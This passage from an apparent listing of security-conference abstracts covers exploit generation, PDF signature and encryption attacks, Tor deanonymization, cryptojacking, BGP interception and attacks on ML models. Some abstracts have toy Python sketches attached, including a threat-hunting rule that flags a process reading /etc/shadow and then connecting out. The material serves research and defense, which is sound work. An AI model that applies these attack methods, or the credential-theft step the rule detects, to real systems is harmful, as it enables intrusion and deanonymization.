A wave of alternative coins that can be effectively mined without specialized hardware, and a surge in cryptocurrencies’ market value, has led to the development of cryptocurrency mining (cryptomining) services, such as Coinhive, which can be easily integrated into websites to monetize the computational power of their visitors. While legitimate website operators are exploring these services as an alternative to advertisements, they have also drawn the attention of cybercriminals: drive-by mining (also known as cryptojacking) is a new web-based attack, in which an infected website secretly executes JavaScript code and/or a WebAssembly module in the user’s browser to mine cryptocurrencies without her consent. In this paper, we perform a comprehensive analysis on Alexa’s Top 1 Million websites to shed light on the prevalence and profitability of this attack. We study the websites affected by drive-by mining to understand the techniques being used to evade detection, and the latest web technologies being exploited to efficiently mine cryptocurrency. As a result of our study, which covers 28 Coinhive-like services that are widely being used by drive-by mining websites, we identified 20 active cryptomining campaigns. Motivated by our findings, we investigate possible countermeasures against this type of attack. We discuss how current blacklisting approaches and heuristics based on CPU usage are insufficient, and present MineSweeper, a novel detection technique that is based on the intrinsic characteristics of cryptomining code, and, thus, is resilient to obfuscation. Our approach could be integrated into browsers to warn users about silent cryptomining when visiting websites that do not ask for their consent.

Pride and Prejudice in Progressive Web Apps: Abusing Native App-like Features in Web Applications

Progressive Web Apps (PWAs) are a new generation of Web applications designed to provide native app-like browsing experiences even when the browser is offline. PWAs make full use of new HTML5 features, which include push notification, cache, and service worker, to provide short-latency and rich Web browsing experiences. We conduct the first systematic study of the security and privacy aspects unique to PWAs. We identify security flaws in main browsers as well as design flaws in popular third-party push services that exacerbate the phishing risk. We introduce a new side-channel attack that infers the victim’s history of visited PWAs. The proposed attack exploits the offline browsing feature of PWAs using a cache. We demonstrate a cryptocurrency mining attack which abuses service workers. Based on an in-depth understanding of these issues, we suggest defenses and recommendations to mitigate the identified security and privacy risks.

Session 9D: Vulnerability Detection

Block Oriented Programming: Automating Data-Only Attacks

With the widespread deployment of Control-Flow Integrity (CFI), control-flow hijacking attacks, and consequently code reuse attacks, are significantly more difficult. CFI limits control flow to well-known locations, severely restricting arbitrary code execution. Assessing the remaining attack surface of an application under advanced control-flow hijack defenses such as CFI and shadow stacks remains an open problem. We introduce BOPC, a mechanism to automatically assess whether an attacker can execute arbitrary code on a binary hardened with CFI/shadow stack defenses. BOPC computes exploits for a target program from payload specifications written in a Turing-complete, high-level language called SPL that abstracts away architecture and program-specific details. SPL payloads are compiled into a program trace that executes the desired behavior on top of the target binary. The input for BOPC is an SPL payload, a starting point (e.g., from a fuzzer crash) and an arbitrary memory write primitive that allows application state corruption. To map SPL payloads to a program trace, BOPC introduces Block Oriented Programming (BOP), a new code reuse technique that utilizes entire basic blocks as gadgets along valid execution paths in the program, i.e., without violating CFI or shadow stack policies. We find that the problem of mapping payloads to program traces is NP-hard, so BOPC first reduces the search space by pruning infeasible paths and then uses heuristics to guide the search to probable paths. BOPC encodes the BOP payload as a set of memory writes. We execute 13 SPL payloads applied to 10 popular applications. BOPC successfully finds payloads and complex execution traces – which would likely not have been found through manual analysis – while following the target’s Control-Flow Graph under an ideal CFI policy in 81% of the cases.

Threat Intelligence Computing

Cyber threat hunting is the process of proactively and iteratively formulating and validating threat hypotheses based on security-relevant observations and domain knowledge. To facilitate threat hunting tasks, this paper introduces threat intelligence computing as a new methodology that models threat discovery as a graph computation problem. It enables efficient programming for solving threat discovery problems, equipping threat hunters with a suite of potent new tools for agile codifications of threat hypotheses, automated evidence mining, and interactive data inspection capabilities. A concrete realization of a threat intelligence computing platform is presented through the design and implementation of a domain-specific graph language with interactive visualization support and a distributed graph database. The platform was evaluated in a two-week DARPA competition for threat detection on a test bed comprising a wide variety of systems monitored in real time. During this period, sub-billion records were produced, streamed, and analyzed, dozens of threat hunting tasks were dynamically planned and programmed, and attack campaigns with diverse malicious intent were discovered. The platform exhibited strong detection and analytics capabilities coupled with high efficiency, resulting in a leadership position in the competition. Additional evaluations on comprehensive policy reasoning are outlined to demonstrate the versatility of the platform and the expressiveness of the language.
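
The paper's thesis, threat discovery as graph computation, can be miniaturized: model monitored events as a labeled provenance graph and express a hunt as a graph query. The toy below uses networkx in place of the paper's domain-specific graph language; the nodes, edge labels, and pattern are all invented.

```python
# Hunt for a simple hypothesis: some process read a sensitive file and
# then opened a network connection (a crude exfiltration pattern).
import networkx as nx

g = nx.DiGraph()
g.add_edge("bash", "/etc/shadow", op="read")
g.add_edge("bash", "10.0.0.7:443", op="connect")
g.add_edge("sshd", "/var/log/auth.log", op="read")

def hunt(graph):
    for proc in graph.nodes:
        reads = [v for _, v, d in graph.out_edges(proc, data=True)
                 if d.get("op") == "read" and v.startswith("/etc/")]
        conns = [v for _, v, d in graph.out_edges(proc, data=True)
                 if d.get("op") == "connect"]
        if reads and conns:
            yield proc, reads, conns

print(list(hunt(g)))   # [('bash', ['/etc/shadow'], ['10.0.0.7:443'])]
```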

Check It Again: Detecting Lacking-Recheck Bugs in OS Kernels

Operating system kernels carry a large number of security checks to validate security-sensitive variables and operations. For example, a security check should be embedded in code to ensure that a user-supplied pointer does not point to the kernel space. Using security-checked variables is typically safe. However, in reality, security-checked variables are often subject to modification after the check. If a recheck is lacking after a modification, security issues may arise, e.g., adversaries can control the checked variable to launch critical attacks such as out-of-bound memory access or privilege escalation. We call such cases lacking-recheck (LRC) bugs, a subclass of TOCTTOU bugs, which have not been explored yet. In this paper, we present the first in-depth study of LRC bugs and develop LRSan, a static analysis system that systematically detects LRC bugs in OS kernels. Using an inter-procedural analysis and multiple new techniques, LRSan first automatically identifies security checks, critical variables, and uses of the checked variables, and then reasons about whether a modification is present after a security check. A case in which a modification is present but a recheck is lacking is an LRC bug. We apply LRSan to the latest Linux kernel and evaluate the effectiveness of LRSan. LRSan reports thousands of potential LRC cases, and we have confirmed 19 new LRC bugs. We also discuss patching strategies of LRC bugs based on our study and bug-fixing experience.

Revery: From Proof-of-Concept to Exploitable

Automatic exploit generation is an open challenge. Existing solutions usually explore in depth the crashing paths, i.e., paths taken by proof-of-concept (POC) inputs triggering vulnerabilities, and generate exploits when exploitable states are found along the paths. However, exploitable states do not always exist in crashing paths. Moreover, existing solutions heavily rely on symbolic execution and are not scalable in path exploration and exploit generation. In addition, few solutions could exploit heap-based vulnerabilities. In this paper, we propose a new solution, Revery, to search for exploitable states in paths diverging from crashing paths, and generate control-flow hijacking exploits for heap-based vulnerabilities. It adopts three novel techniques: (1) a digraph to characterize a vulnerability’s memory layout and its contributor instructions; (2) a fuzzing solution to explore diverging paths, which have similar memory layouts as the crashing paths, in order to search more exploitable states and generate corresponding diverging inputs; (3) a stitch solution to stitch crashing paths and diverging paths together, and synthesize EXP inputs able to trigger both vulnerabilities and exploitable states. We have developed a prototype of Revery based on the binary analysis engine angr, and evaluated it on a set of 19 real world CTF (capture the flag) challenges. Experiment results showed that it could generate exploits for 9 (47%) of them, and generate EXP inputs able to trigger exploitable states for another 5 (26%) of them.

Session 10A: TOR

Deep Fingerprinting: Undermining Website Fingerprinting Defenses with Deep Learning

Website fingerprinting enables a local eavesdropper to determine which websites a user is visiting over an encrypted connection. State-of-the-art website fingerprinting attacks have been shown to be effective even against Tor. Recently, lightweight website fingerprinting defenses for Tor have been proposed that substantially degrade existing attacks: WTF-PAD and Walkie-Talkie. In this work, we present Deep Fingerprinting (DF), a new website fingerprinting attack against Tor that leverages a type of deep learning called Convolutional Neural Networks (CNN) with a sophisticated architecture design, and we evaluate this attack against WTF-PAD and Walkie-Talkie. The DF attack attains over 98% accuracy on Tor traffic without defenses, better than all prior attacks, and it is also the only attack that is effective against WTF-PAD with over 90% accuracy. Walkie-Talkie remains effective, holding the attack to just 49.7% accuracy. In the more realistic open-world setting, our attack remains effective, with 0.99 precision and 0.94 recall on undefended traffic. Against traffic defended with WTF-PAD in this setting, the attack still can get 0.96 precision and 0.68 recall. These findings highlight the need for effective defenses that protect against this new attack and that could be deployed in Tor.
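
What makes the attack work is the input representation: a trace is reduced to its sequence of packet directions (+1/-1) and fed to a 1D CNN. A skeletal PyTorch version with invented layer sizes follows; the paper's DF network is considerably deeper and carefully tuned.

```python
# Skeleton of a DF-style website-fingerprinting classifier over packet
# direction sequences.
import torch
import torch.nn as nn

class DFNet(nn.Module):
    def __init__(self, n_sites: int):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv1d(1, 32, kernel_size=8, padding=4), nn.ReLU(),
            nn.MaxPool1d(8),
            nn.Conv1d(32, 64, kernel_size=8, padding=4), nn.ReLU(),
            nn.AdaptiveAvgPool1d(1),
        )
        self.classify = nn.Linear(64, n_sites)

    def forward(self, directions):          # (batch, seq_len) floats of +/-1
        h = self.features(directions.unsqueeze(1))   # add a channel dim
        return self.classify(h.squeeze(-1))          # logits over sites
```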

Privacy-Preserving Dynamic Learning of Tor Network Traffic

Experimentation tools facilitate exploration of Tor performance and security research problems and allow researchers to safely and privately conduct Tor experiments without risking harm to real Tor users. However, researchers using these tools configure them to generate network traffic based on simplifying assumptions and outdated measurements and without understanding the efficacy of their configuration choices. In this work, we design a novel technique for dynamically learning Tor network traffic models using hidden Markov modeling and privacy-preserving measurement techniques. We conduct a safe but detailed measurement study of Tor using 17 relays (~2% of Tor bandwidth) over the course of 6 months, measuring general statistics and models that can be used to generate a sequence of streams and packets. We show how our measurement results and traffic models can be used to generate traffic flows in private Tor networks and how our models are more realistic than standard and alternative network traffic generation methods.

DeepCorr: Strong Flow Correlation Attacks on Tor Using Deep Learning

Flow correlation is the core technique used in a multitude of deanonymization attacks on Tor. Despite the importance of flow correlation attacks on Tor, existing flow correlation techniques are considered to be ineffective and unreliable in linking Tor flows when applied at a large scale, i.e., they impose high false positive error rates or require impractically long flow observations to be able to make reliable correlations. In this paper, we show that, unfortunately, flow correlation attacks can be conducted on Tor traffic with drastically higher accuracies than before by leveraging emerging learning mechanisms. We particularly design a system, called DeepCorr, that outperforms the state-of-the-art by significant margins in correlating Tor connections. DeepCorr leverages an advanced deep learning architecture to learn a flow correlation function tailored to Tor’s complex network; this is in contrast to previous works’ use of generic statistical correlation metrics to correlate Tor flows. We show that with moderate learning, DeepCorr can correlate Tor connections (and therefore break its anonymity) with accuracies significantly higher than existing algorithms, and using substantially shorter lengths of flow observations. For instance, by collecting only about 900 packets of each target Tor flow (roughly 900KB of Tor data), DeepCorr provides a flow correlation accuracy of 96% compared to 4% by the state-of-the-art system of RAPTOR using the same exact setting. We hope that our work demonstrates the escalating threat of flow correlation attacks on Tor given recent advances in learning algorithms, calling for the timely deployment of effective countermeasures by the Tor community.

Measuring Information Leakage in Website Fingerprinting Attacks and Defenses

Tor provides low-latency anonymous and uncensored network access against a local or network adversary. Due to the design choice to minimize traffic overhead (and increase the pool of potential users) Tor allows some information about the client’s connections to leak. Attacks using (features extracted from) this information to infer the website a user visits are called Website Fingerprinting (WF) attacks. We develop a methodology and tools to measure the amount of leaked information about a website. We apply this tool to a comprehensive set of features extracted from a large set of websites and WF defense mechanisms, allowing us to make more fine-grained observations about WF attacks and defenses.
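
The quantity being measured is the mutual information between (functions of) traffic features and the visited website. A plug-in estimate over a discretized toy feature shows the shape of the computation; the paper's estimator is far more careful about continuous features and joint feature sets.

```python
# Plug-in mutual information estimate (in bits) from (feature, site) pairs.
import math
from collections import Counter

def mutual_information(pairs):
    n = len(pairs)
    joint, feat, site = Counter(pairs), Counter(), Counter()
    for f, s in pairs:
        feat[f] += 1
        site[s] += 1
    return sum(c / n * math.log2(c * n / (feat[f] * site[s]))
               for (f, s), c in joint.items())

# A feature that perfectly determines one of two sites leaks exactly 1 bit.
print(mutual_information([("small", "siteA"), ("large", "siteB")] * 50))
```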

Session 10D: Fuzzing, Exploitation, and Side Channels

Hawkeye: Towards a Desired Directed Grey-box Fuzzer

Grey-box fuzzing is a practically effective approach to test real-world programs. However, most existing grey-box fuzzers lack directedness, i.e. the capability of executing towards user-specified target sites in the program. To emphasize existing challenges in directed fuzzing, we propose Hawkeye to feature four desired properties of directed grey-box fuzzers. Owing to a novel static analysis on the program under test and the target sites, Hawkeye precisely collects the information such as the call graph, function and basic block level distances to the targets. During fuzzing, Hawkeye evaluates exercised seeds based on both static information and the execution traces to generate the dynamic metrics, which are then used for seed prioritization, power scheduling and adaptive mutating. These strategies help Hawkeye to achieve better directedness and gravitate towards the target sites. We implemented Hawkeye as a fuzzing framework and evaluated it on various real-world programs under different scenarios. The experimental results showed that Hawkeye can reach the target sites and reproduce the crashes much faster than state-of-the-art grey-box fuzzers such as AFL and AFLGo. In particular, Hawkeye can reduce the time to exposure for certain vulnerabilities from about 3.5 hours to 0.5 hour. To date, Hawkeye has detected more than 41 previously unknown crashes in projects such as Oniguruma, MJS with the target sites provided by vulnerability prediction tools; all these crashes are confirmed and 15 of them have been assigned CVE IDs.
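
The static ingredient of directedness is a distance map from program locations to the target sites, computed over the call graph and consulted when prioritizing seeds. The networkx sketch below uses plain unweighted shortest paths over an invented call graph; Hawkeye's actual metric also weights call patterns, so this is only the basic idea.

```python
# Distance of every function to a target over a toy call graph, then a
# seed score: the closer a seed's trace gets to the target, the better.
import networkx as nx

call_graph = nx.DiGraph([
    ("main", "parse"), ("parse", "decode"), ("decode", "target_fn"),
    ("main", "log"),
])

# Shortest-path lengths *to* the target = lengths from it in the reversed graph.
dist = nx.shortest_path_length(call_graph.reverse(copy=True), source="target_fn")

def seed_score(trace):
    reached = [dist[f] for f in trace if f in dist]
    return min(reached, default=float("inf"))    # smaller is better

print(seed_score(["main", "parse"]))   # 2: "parse" is two calls from the target
```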

ret2spec: Speculative Execution Using Return Stack Buffers

Speculative execution is an optimization technique that has been part of CPUs for over a decade. It predicts the outcome and target of branch instructions to avoid stalling the execution pipeline. However, until recently, the security implications of speculative code execution have not been studied. In this paper, we investigate a special type of branch predictor that is responsible for predicting return addresses. To the best of our knowledge, we are the first to study return address predictors and their consequences for the security of modern software. In our work, we show how return stack buffers (RSBs), the core unit of return address predictors, can be used to trigger misspeculations. Based on this knowledge, we propose two new attack variants using RSBs that give attackers similar capabilities as the documented Spectre attacks. We show how local attackers can gain arbitrary speculative code execution across processes, e.g., to leak passwords another user enters on a shared system. Our evaluation showed that the recent Spectre countermeasures deployed in operating systems can also cover such RSB-based cross-process attacks. Yet we then demonstrate that attackers can trigger misspeculation in JIT environments in order to leak arbitrary memory content of browser processes. Reading outside the sandboxed memory region with JIT-compiled code is still possible with 80% accuracy on average.

Evaluating Fuzz Testing

Fuzz testing has enjoyed great success at discovering security critical bugs in real software. Recently, researchers have devoted significant effort to devising new fuzzing techniques, strategies, and algorithms. Such new ideas are primarily evaluated experimentally so an important question is: What experimental setup is needed to produce trustworthy results? We surveyed the recent research literature and assessed the experimental evaluations carried out by 32 fuzzing papers. We found problems in every evaluation we considered. We then performed our own extensive experimental evaluation using an existing fuzzer. Our results showed that the general problems we found in existing experimental evaluations can indeed translate to actual wrong or misleading assessments. We conclude with some guidelines that we hope will help improve experimental evaluations of fuzz testing algorithms, making reported results more robust.
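
One of the paper's concrete recommendations is to compare fuzzers over many repeated trials with a statistical test, since single runs vary heavily with randomness. A minimal example with invented trial data:

```python
# Compare unique-crash counts from repeated independent trials of two
# fuzzers with the Mann-Whitney U test (the data below is made up).
from scipy.stats import mannwhitneyu

fuzzer_a = [12, 15, 9, 14, 13, 11, 16, 10, 12, 14]   # 10 trials each
fuzzer_b = [8, 9, 11, 7, 10, 9, 8, 12, 9, 10]

stat, p = mannwhitneyu(fuzzer_a, fuzzer_b, alternative="two-sided")
print(f"U={stat}, p={p:.4f}")    # a small p suggests a real difference
```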

Rendered Insecure: GPU Side Channel Attacks are Practical

Graphics Processing Units (GPUs) are commonly integrated with computing devices to enhance the performance and capabilities of graphical workloads. In addition, they are increasingly being integrated in data centers and clouds such that they can be used to accelerate data intensive workloads. Under a number of scenarios the GPU can be shared between multiple applications at a fine granularity allowing a spy application to monitor side channels and attempt to infer the behavior of the victim. For example, OpenGL and WebGL send workloads to the GPU at the granularity of a frame, allowing an attacker to interleave the use of the GPU to measure the side-effects of the victim computation through performance counters or other resource tracking APIs. We demonstrate the vulnerability using two applications. First, we show that an OpenGL based spy can fingerprint websites accurately, track user activities within the website, and even infer the keystroke timings for a password text box with high accuracy. The second application demonstrates how a CUDA spy application can derive the internal parameters of a neural network model being used by another CUDA application, illustrating these threats on the cloud. To counter these attacks, the paper suggests mitigations based on limiting the rate of the calls, or limiting the granularity of the returned information.

2019 Proceedings dblp

Session 1A: Attack I

1 Trillion Dollar Refund: How To Spoof PDF Signatures

The Portable Document Format (PDF) is the de-facto standard for document exchange worldwide. To guarantee the authenticity and integrity of documents, digital signatures are used. Several public and private services ranging from governments, public enterprises, banks, and payment services rely on the security of PDF signatures.

In this paper, we present the first comprehensive security evaluation on digital signatures in PDFs. We introduce three novel attack classes which bypass the cryptographic protection of digitally signed PDF files allowing an attacker to spoof the content of a signed PDF. We analyzed 22 different PDF viewers and found 21 of them to be vulnerable, including prominent and widely used applications such as Adobe Reader DC and Foxit. We additionally evaluated eight online validation services and found six to be vulnerable. A possible explanation for these results could be the absence of a standard algorithm to verify PDF signatures – each client verifies signatures differently, and attacks can be tailored to these differences. We, therefore, propose the standardization of a secure verification algorithm, which we describe in this paper.

All findings have been responsibly disclosed, and the affected vendors were supported in fixing the issues. As a result, three generic CVEs for each attack class were issued [50-52]. Our research on PDF signatures and more information is also available online at https://www.pdf-insecurity.org/.

Practical Decryption exFiltration: Breaking PDF Encryption

The Portable Document Format, better known as PDF, is one of the most widely used document formats worldwide, and in order to ensure information confidentiality, this file format supports document encryption. In this paper, we analyze PDF encryption and show two novel techniques for breaking the confidentiality of encrypted documents. First, we abuse the PDF feature of partially encrypted documents to wrap the encrypted part of the document within attacker-controlled content and therefore, exfiltrate the plaintext once the document is opened by a legitimate user. Second, we abuse a flaw in the PDF encryption specification to arbitrarily manipulate encrypted content. The only requirement is that a single block of known plaintext is needed, and we show that this is fulfilled by design. Our attacks allow the recovery of the entire plaintext of encrypted documents by using exfiltration channels which are based on standard compliant PDF properties. We evaluated our attacks on 27 widely used PDF viewers and found all of them to be vulnerable. We responsibly disclosed the vulnerabilities and supported the vendors in fixing the issues.

Session 1C: Cloud Security I

A Machine-Checked Proof of Security for AWS Key Management Service

We present a machine-checked proof of security for the domain management protocol of Amazon Web Services’ KMS (Key Management Service), a critical security service used throughout AWS and by AWS customers. Domain management is at the core of AWS KMS; it governs the top-level keys that anchor the security of encryption services at AWS. We show that the protocol securely implements an ideal distributed encryption mechanism under standard cryptographic assumptions. The proof is machine-checked in the EasyCrypt proof assistant and is the largest EasyCrypt development to date.

Mitigating Leakage in Secure Cloud-Hosted Data Structures: Volume-Hiding for Multi-Maps via Hashing

Volume leakage has recently been identified as a major threat to the security of cryptographic cloud-based data structures by Kellaris et al. [CCS’16] (see also the attacks in Grubbs et al. [CCS’18] and Lacharité et al. [S&P’18]). In this work, we focus on volume-hiding implementations of encrypted multi-maps as first considered by Kamara and Moataz [Eurocrypt’19]. Encrypted multi-maps consist of outsourcing the storage of a multi-map to an untrusted server, such as a cloud storage system, while maintaining the ability to perform private queries. Volume-hiding encrypted multi-maps ensure that the number of responses (volume) for any query remains hidden from the adversarial server. As a result, volume-hiding schemes can prevent leakage attacks that leverage the adversary’s knowledge of the number of query responses to compromise privacy. We present both conceptual and algorithmic contributions towards volume-hiding encrypted multi-maps. We introduce the first formal definition of volume-hiding leakage functions. In terms of design, we present the first volume-hiding encrypted multi-map dprfMM whose storage and query complexity are both asymptotically optimal. Furthermore, we experimentally show that our construction is practically efficient. Our server storage is smaller than the best previous construction while we improve query complexity by a factor of 10-16x. In addition, we introduce the notion of differentially private volume-hiding leakage functions which strikes a better, tunable balance between privacy and efficiency. To accompany our new notion, we present a differentially private volume-hiding encrypted multi-map dpMM whose query complexity is the volume of the queried key plus an additional logarithmic factor. This is a significant improvement compared to all previous volume-hiding schemes whose query overhead was the maximum volume of any key. In natural settings, our construction improves the average query overhead by a factor of 150-240x over the previous best volume-hiding construction even when considering a small privacy budget of ε=0.2.
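
For intuition, the naive baseline that earlier volume-hiding schemes effectively pay for can be sketched in a few lines: pad every response to the maximum volume, so the (encrypted) response length reveals nothing about the queried key. The multi-map below is invented; dprfMM achieves the same hiding property with asymptotically optimal storage and query cost.

```python
# Naive volume-hiding baseline: pad every multi-map response to the
# maximum volume of any key, so response length leaks nothing.
multimap = {"k1": ["v1"], "k2": ["v2", "v3", "v4"], "k3": ["v5", "v6"]}
MAX_VOLUME = max(len(v) for v in multimap.values())
PAD = "<dummy>"

def padded_response(key):
    values = list(multimap.get(key, []))
    return values + [PAD] * (MAX_VOLUME - len(values))

print(padded_response("k1"))  # ['v1', '<dummy>', '<dummy>'] -- length independent of key
```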

Session 2B: ML Security I

Neural Network Inversion in Adversarial Setting via Background Knowledge Alignment

The wide application of deep learning technique has raised new security concerns about the training data and test data. In this work, we investigate the model inversion problem under adversarial settings, where the adversary aims at inferring information about the target model’s training data and test data from the model’s prediction values. We develop a solution to train a second neural network that acts as the inverse of the target model to perform the inversion. The inversion model can be trained with black-box accesses to the target model. We propose two main techniques towards training the inversion model in the adversarial settings. First, we leverage the adversary’s background knowledge to compose an auxiliary set to train the inversion model, which does not require access to the original training data. Second, we design a truncation-based technique to align the inversion model to enable effective inversion of the target model from partial predictions that the adversary obtains on victim user’s data. We systematically evaluate our approach in various machine learning tasks and model architectures on multiple image datasets. We also confirm our results on Amazon Rekognition, a commercial prediction API that offers “machine learning as a service”. We show that even with partial knowledge about the black-box model’s training data, and with only partial prediction values, our inversion approach is still able to perform accurate inversion of the target model, and outperform previous approaches.
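
A minimal PyTorch sketch of the inversion idea; the target model and the auxiliary data are random stand-ins, and `truncate` mirrors the paper's trick of aligning the inversion model to partial (top-k) predictions:

```python
import torch
import torch.nn as nn

target_model = nn.Sequential(nn.Linear(28 * 28, 10))  # stand-in black-box target
inversion = nn.Sequential(                            # toy decoder: 10 scores -> 28x28 image
    nn.Linear(10, 256), nn.ReLU(),
    nn.Linear(256, 28 * 28), nn.Sigmoid(),
)
opt = torch.optim.Adam(inversion.parameters(), lr=1e-3)

def truncate(scores, k=3):
    """Zero all but the top-k scores: training on truncated vectors lets
    the inversion model cope with partial predictions at attack time."""
    top = scores.topk(k, dim=1)
    return torch.zeros_like(scores).scatter(1, top.indices, top.values)

for step in range(100):
    x = torch.rand(64, 28 * 28)                       # stand-in for auxiliary data
    with torch.no_grad():                             # black-box access: scores only
        scores = torch.softmax(target_model(x), dim=1)
    loss = nn.functional.mse_loss(inversion(truncate(scores)), x)
    opt.zero_grad(); loss.backward(); opt.step()
```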

Privacy Risks of Securing Machine Learning Models against Adversarial Examples

The arms race between attacks and defenses for machine learning models has come to a forefront in recent years, in both the security community and the privacy community. However, one big limitation of previous research is that the security domain and the privacy domain have typically been considered separately. It is thus unclear whether the defense methods in one domain will have any unexpected impact on the other domain. In this paper, we take a step towards resolving this limitation by combining the two domains. In particular, we measure the success of membership inference attacks against six state-of-the-art defense methods that mitigate the risk of adversarial examples (i.e., evasion attacks). Membership inference attacks determine whether or not an individual data record has been part of a model’s training set. The accuracy of such attacks reflects the information leakage of training algorithms about individual members of the training set. Adversarial defense methods against adversarial examples influence the model’s decision boundaries such that model predictions remain unchanged for a small area around each input. However, this objective is optimized on training data. Thus, individual data records in the training set have a significant influence on robust models. This makes the models more vulnerable to inference attacks. To perform the membership inference attacks, we leverage the existing inference methods that exploit model predictions. We also propose two new inference methods that exploit structural properties of robust models on adversarially perturbed data. Our experimental evaluation demonstrates that compared with the natural training (undefended) approach, adversarial defense methods can indeed increase the target model’s risk against membership inference attacks. When using adversarial defenses to train the robust models, the membership inference advantage increases by up to 4.5 times compared to the naturally undefended models. Beyond revealing the privacy risks of adversarial defenses, we further investigate the factors, such as model capacity, that influence the membership information leakage.

MemGuard: Defending against Black-Box Membership Inference Attacks via Adversarial Examples

In a membership inference attack, an attacker aims to infer whether a data sample is in a target classifier’s training dataset or not. Specifically, given a black-box access to the target classifier, the attacker trains a binary classifier, which takes a data sample’s confidence score vector predicted by the target classifier as an input and predicts the data sample to be a member or non-member of the target classifier’s training dataset. Membership inference attacks pose severe privacy and security threats to the training dataset. Most existing defenses leverage differential privacy when training the target classifier or regularize the training process of the target classifier. These defenses suffer from two key limitations: 1) they do not have formal utility-loss guarantees of the confidence score vectors, and 2) they achieve suboptimal privacy-utility tradeoffs. In this work, we propose MemGuard, the first defense with formal utility-loss guarantees against black-box membership inference attacks. Instead of tampering with the training process of the target classifier, MemGuard adds noise to each confidence score vector predicted by the target classifier. Our key observation is that the attacker uses a classifier to predict member or non-member, and this classifier is vulnerable to adversarial examples. Based on this observation, we propose to add a carefully crafted noise vector to a confidence score vector to turn it into an adversarial example that misleads the attacker’s classifier. Specifically, MemGuard works in two phases. In Phase I, MemGuard finds a carefully crafted noise vector that can turn a confidence score vector into an adversarial example, which is likely to mislead the attacker’s classifier into making a random guess at member or non-member. We find such a carefully crafted noise vector via a new method that we design to incorporate the unique utility-loss constraints on the noise vector. In Phase II, MemGuard adds the noise vector to the confidence score vector with a certain probability, which is selected to satisfy a given utility-loss budget on the confidence score vector. Our experimental results on three datasets show that MemGuard can effectively defend against membership inference attacks and achieve better privacy-utility tradeoffs than existing defenses. Our work is the first to show that adversarial examples can be used as defensive mechanisms to defend against membership inference attacks.
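
A heavily simplified NumPy sketch of Phase I: a linear model stands in for the attacker's membership classifier, and plain gradient steps stand in for MemGuard's constrained optimization. The label-preservation and utility-budget checks are the part that carries the paper's idea.

```python
import numpy as np

w, b = np.array([0.8, -0.5, 0.1]), -0.2       # stand-in linear attack classifier

def memguard_like(conf, budget=0.6, lr=0.05, steps=50):
    noisy = conf.copy()
    for _ in range(steps):
        if w @ noisy + b < 0:                 # attack classifier now says "non-member"
            return noisy
        noisy = np.clip(noisy - lr * w, 1e-6, None)
        noisy /= noisy.sum()                  # stay on the probability simplex
        if noisy.argmax() != conf.argmax() or np.abs(noisy - conf).sum() > budget:
            return conf                       # utility-loss constraint violated: give up
    return conf

print(memguard_like(np.array([0.7, 0.2, 0.1])))  # perturbed scores, same top-1 label
```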

Procedural Noise Adversarial Examples for Black-Box Attacks on Deep Convolutional Networks

Deep Convolutional Networks (DCNs) have been shown to be vulnerable to adversarial examples—perturbed inputs specifically designed to produce intentional errors in the learning algorithms at test time. Existing input-agnostic adversarial perturbations exhibit interesting visual patterns that are currently unexplained. In this paper, we introduce a structured approach for generating Universal Adversarial Perturbations (UAPs) with procedural noise functions. Our approach unveils the systemic vulnerability of popular DCN models like Inception v3 and YOLO v3, with single noise patterns able to fool a model on up to 90% of the dataset. Procedural noise allows us to generate a distribution of UAPs with high universal evasion rates using only a few parameters. Additionally, we propose Bayesian optimization to efficiently learn procedural noise parameters to construct inexpensive untargeted black-box attacks. We demonstrate that it can achieve an average of less than 10 queries per successful attack, a 100-fold improvement on existing methods. We further motivate the use of input-agnostic defences to increase the stability of models to adversarial perturbations. The universality of our attacks suggests that DCN models may be sensitive to aggregations of low-level class-agnostic features. These findings give insight on the nature of some universal adversarial perturbations and how they could be generated in other applications.
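
The mechanics can be sketched with a crude value-noise generator standing in for the Perlin and Gabor functions the paper uses (the Bayesian search over noise parameters is omitted); the point is that a handful of parameters yields an input-agnostic perturbation:

```python
import numpy as np

def value_noise(size=224, grid=8, seed=0):
    """Crude procedural noise: a random coarse grid upsampled to full size."""
    rng = np.random.default_rng(seed)
    coarse = rng.uniform(-1, 1, (grid, grid))
    return np.kron(coarse, np.ones((size // grid, size // grid)))[:size, :size]

def apply_uap(image, eps=8 / 255, grid=8, seed=0):
    uap = value_noise(image.shape[0], grid, seed) * eps  # one pattern for every input
    return np.clip(image + uap[..., None], 0.0, 1.0)

x = np.random.rand(224, 224, 3)   # stand-in image in [0, 1]
x_adv = apply_uap(x)              # perturbation bounded by eps in L-infinity
```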

Session 2E: Internet Security

SICO: Surgical Interception Attacks by Manipulating BGP Communities

The Border Gateway Protocol (BGP) is the primary routing protocol for the Internet backbone, yet it lacks adequate security mechanisms. While simple BGP hijack attacks only involve an adversary hijacking Internet traffic destined to a victim, more complex and challenging interception attacks require that the adversary intercept a victim’s traffic and forward it on to the victim. If an interception attack is launched incorrectly, the adversary’s attack will disrupt its route to the victim, making it impossible to forward packets. To overcome these challenges, we introduce SICO attacks (Surgical Interception using COmmunities): a novel method of launching interception attacks that leverages BGP communities to scope an adversary’s attack and ensure a route to the victim. We then show how SICO attacks can be targeted to specific source IP addresses for reducing attack costs. Furthermore, we ethically perform SICO attacks on the real Internet backbone to evaluate their feasibility and effectiveness. Results suggest that SICO attacks can achieve interception even when previously proposed attacks would not be feasible, and outperform them by attracting traffic from an additional 16% of Internet hosts (worst case) and 58% of Internet hosts (best case). Finally, we analyze the Internet topology to find that at least 83% of multi-homed ASes are capable of launching these attacks.

Just the Tip of the Iceberg: Internet-Scale Exploitation of Routers for Cryptojacking

The release of an efficient browser-based cryptominer, as introduced by Coinhive in 2017, has quickly spread throughout the web, either as a new source of revenue for websites or as a tool exploited in hacks and malicious advertisements. Several studies have analyzed the Alexa Top 1M and found 380 - 3,200 (0.038% - 0.32%) to be actively mining, with an estimated $41,000 per month revenue for the top 10 perpetrators. While placing a cryptominer on a popular website supplies considerable returns from its visitors’ web browsers, it only generates revenue while a client is visiting the page. Even though large popular websites attract millions of visitors, the relatively low number of exploiting websites limits the total revenue that can be made. In this paper, we report on a new attack vector that drastically overshadows all existing cryptojacking activity discovered to date. Through a firmware vulnerability in MikroTik routers, cyber criminals are able to rewrite outgoing user traffic and embed cryptomining code in every outgoing web connection. Thus, every web page visited by any user behind an infected router would mine to profit the criminals. Based on NetFlows recorded in a Tier 1 network, semiweekly crawls and telescope traffic, we followed their activities over a period of 10 months, and report on the modus operandi and coordinating infrastructure of the perpetrators, who during this period were in control of up to 1.4M routers, approximately 70% of all MikroTik devices deployed worldwide. We observed different levels of sophistication among adversaries, ranging from individual installations to campaigns involving large numbers 